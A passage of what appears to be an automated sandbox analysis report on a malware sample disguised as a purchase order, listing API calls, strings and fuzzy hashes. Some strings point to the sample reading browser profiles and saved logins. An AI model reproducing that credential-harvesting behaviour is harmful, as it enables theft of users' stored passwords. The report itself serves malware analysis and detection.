                                                                                                      • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                                                                      • wcscpy.MSVCRT ref: 0041341F
                                                                                                      • _snwprintf.MSVCRT ref: 0041348E
                                                                                                      • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                                      • SetFocus.USER32(00000000), ref: 004134B7
                                                                                                      Strings
                                                                                                      • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                                      • {Unknown}, xrefs: 004132A6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                      • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                      • API String ID: 4111938811-1819279800
                                                                                                      • Opcode ID: 40febe18c8ea58ee401dc1d7e9b16ea7dd9e42426c780dab9fc2ef4c2d2113e8
                                                                                                      • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                                                      • Opcode Fuzzy Hash: 40febe18c8ea58ee401dc1d7e9b16ea7dd9e42426c780dab9fc2ef4c2d2113e8
                                                                                                      • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                                                      APIs
                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                                      • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                                      • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                                      • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                                      • EndDialog.USER32(?,?), ref: 0040135E
                                                                                                      • DeleteObject.GDI32(?), ref: 0040136A
                                                                                                      • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                                      • ShowWindow.USER32(00000000), ref: 00401398
                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                                      • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                                      • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                                      • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                                      • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                                      • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                      • String ID:
                                                                                                      • API String ID: 829165378-0
                                                                                                      • Opcode ID: d28eae30b51bd20c699493622e1b5036da36ceab07d34b4d33997197d58435e6
                                                                                                      • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                                                      • Opcode Fuzzy Hash: d28eae30b51bd20c699493622e1b5036da36ceab07d34b4d33997197d58435e6
                                                                                                      • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 00404172
                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                      • wcscpy.MSVCRT ref: 004041D6
                                                                                                      • wcscpy.MSVCRT ref: 004041E7
                                                                                                      • memset.MSVCRT ref: 00404200
                                                                                                      • memset.MSVCRT ref: 00404215
                                                                                                      • _snwprintf.MSVCRT ref: 0040422F
                                                                                                      • wcscpy.MSVCRT ref: 00404242
                                                                                                      • memset.MSVCRT ref: 0040426E
                                                                                                      • memset.MSVCRT ref: 004042CD
                                                                                                      • memset.MSVCRT ref: 004042E2
                                                                                                      • _snwprintf.MSVCRT ref: 004042FE
                                                                                                      • wcscpy.MSVCRT ref: 00404311
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                                      • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                                      • API String ID: 2454223109-1580313836
                                                                                                      • Opcode ID: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                                                                                                      • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                                                      • Opcode Fuzzy Hash: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                                                                                                      • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                                      APIs
                                                                                                      • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                      • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                      • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                      • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                      • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                      • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                      • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                      • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                      • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$HandleModule
                                                                                                      • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll$p+8w@F8w@B8w
                                                                                                      • API String ID: 667068680-4123708296
                                                                                                      • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                      • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                                                      • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                      • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                                      • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                                      • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                                      • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                                      • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                                      • memcpy.MSVCRT(?,?,00002008,?,00000000,/nosaveload,00000000,00000001), ref: 004115C8
                                                                                                      • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                                      • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                                      • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                                      • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                                      • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                                      • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                                        • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                                        • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                                      • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                                      • API String ID: 4054529287-3175352466
                                                                                                      • Opcode ID: 8847399f9b9726e4c3d36038752de16191353ca0570e8d305bfc5bef64df017b
                                                                                                      • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                                      • Opcode Fuzzy Hash: 8847399f9b9726e4c3d36038752de16191353ca0570e8d305bfc5bef64df017b
                                                                                                      • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                                                      APIs
                                                                                                      Strings
Memory Dump Source
• Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
Similarity
• API ID: wcscat$_snwprintfmemset$wcscpy
• String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
• API String ID: 3143752011-1996832678
• Opcode ID: 2285b8ceb197b06ade8a7456e1cd80ecea3148a8de1f9abac7666ee038ff1786
• Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
• Opcode Fuzzy Hash: 2285b8ceb197b06ade8a7456e1cd80ecea3148a8de1f9abac7666ee038ff1786
• Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
Similarity
• API ID: _snwprintfmemset$wcscpy$wcscat
• String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
• API String ID: 1607361635-601624466
• Opcode ID: 5308ba8bd989b40c7668cc636176173edab96e663f2450d9c372c8e2c13fb1a4
• Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
• Opcode Fuzzy Hash: 5308ba8bd989b40c7668cc636176173edab96e663f2450d9c372c8e2c13fb1a4
• Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
Similarity
• API ID: _snwprintf$memset$wcscpy
• String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
• API String ID: 2000436516-3842416460
• Opcode ID: f43de039386cd0382df8450c395ac1cae23be0dcf7256b882f2abc90b2723d32
• Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
• Opcode Fuzzy Hash: f43de039386cd0382df8450c395ac1cae23be0dcf7256b882f2abc90b2723d32
• Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
APIs
  • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
  • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
  • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
  • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
  • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
  • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
  • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
  • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
  • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
  • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
  • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
• GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
• LoadIconW.USER32(00000000,00000072), ref: 004035CA
• GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
• LoadIconW.USER32(00000000,00000074), ref: 004035E4
• GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
• LoadIconW.USER32(00000000,00000073), ref: 004035F8
• GetModuleHandleW.KERNEL32(00000000), ref: 00403607
• LoadIconW.USER32(00000000,00000075), ref: 0040360C
• GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
• LoadIconW.USER32(00000000,0000006F), ref: 00403620
• GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
• LoadIconW.USER32(00000000,00000076), ref: 00403634
• GetModuleHandleW.KERNEL32(00000000), ref: 00403643
• LoadIconW.USER32(00000000,00000077), ref: 00403648
• GetModuleHandleW.KERNEL32(00000000), ref: 00403657
• LoadIconW.USER32(00000000,00000070), ref: 0040365C
• GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
• LoadIconW.USER32(00000000,00000078), ref: 00403670
Memory Dump Source
• Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
Similarity
• API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
• String ID:
• API String ID: 1043902810-0
• Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
• Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
• Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
• Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
APIs
• ??2@YAPAXI@Z.MSVCRT(?,00000000,0040DC1B,?,00000000), ref: 0044480A
• _snwprintf.MSVCRT ref: 0044488A
• wcscpy.MSVCRT ref: 004448B4
• ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
Strings
Memory Dump Source
• Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
Similarity
• API ID: ??2@??3@_snwprintfwcscpy
• String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
• API String ID: 2899246560-1542517562
• Opcode ID: 19d6998bfdee0d99a36ebb4c1c86c750fd11cd17c22eb045823aea5ab7461c2f
• Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
• Opcode Fuzzy Hash: 19d6998bfdee0d99a36ebb4c1c86c750fd11cd17c22eb045823aea5ab7461c2f
• Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
APIs
• memset.MSVCRT ref: 0040DBCD
• memset.MSVCRT ref: 0040DBE9
  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
  • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT(?,00000000,0040DC1B,?,00000000), ref: 0044480A
  • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
  • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
• wcscpy.MSVCRT ref: 0040DC2D
• wcscpy.MSVCRT ref: 0040DC3C
• wcscpy.MSVCRT ref: 0040DC4C
• EnumResourceNamesW.KERNEL32(0040DD4B,00000004,0040D957,00000000), ref: 0040DCB1
• EnumResourceNamesW.KERNEL32(0040DD4B,00000005,0040D957,00000000), ref: 0040DCBB
• wcscpy.MSVCRT ref: 0040DCC3
Strings
Memory Dump Source
• Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
Similarity
• API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
• String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
• API String ID: 3330709923-517860148
• Opcode ID: f76f60bccd3da85fbe49f53365f8b4a79ddd0aed292bd4a30626083a862f5199
• Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
• Opcode Fuzzy Hash: f76f60bccd3da85fbe49f53365f8b4a79ddd0aed292bd4a30626083a862f5199
• Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
APIs
  • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
  • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
  • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
• memset.MSVCRT ref: 0040806A
• memset.MSVCRT ref: 0040807F
• _wtoi.MSVCRT(00000000,00000000,00000136,00000000,00000135,00000000,00000134,00000000,00000133,00000000,00000132,00000000,00000131,00000000,00000130,00000000), ref: 004081AF
• _wcsicmp.MSVCRT ref: 004081C3
• memset.MSVCRT ref: 004081E4
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
  • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
  • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
  • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
  • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
  • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
  • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
  • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
  • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
  • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
  • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
Strings
Memory Dump Source
• Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
Similarity
• API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
• String ID: logins$null
• API String ID: 2148543256-2163367763
• Opcode ID: 0c5bf0fe86f5c58e26a0e15e1bc426e9e739ab0ab567f24c82d75e1353058837
• Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
• Opcode Fuzzy Hash: 0c5bf0fe86f5c58e26a0e15e1bc426e9e739ab0ab567f24c82d75e1353058837
• Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
APIs
  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
• GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
• ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
• memset.MSVCRT ref: 004085CF
• memset.MSVCRT ref: 004085F1
• memset.MSVCRT ref: 00408606
• strcmp.MSVCRT ref: 00408645
• _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
• _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
• memset.MSVCRT ref: 0040870E
• strcmp.MSVCRT ref: 0040876B
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
• CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
Strings
Memory Dump Source
• Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
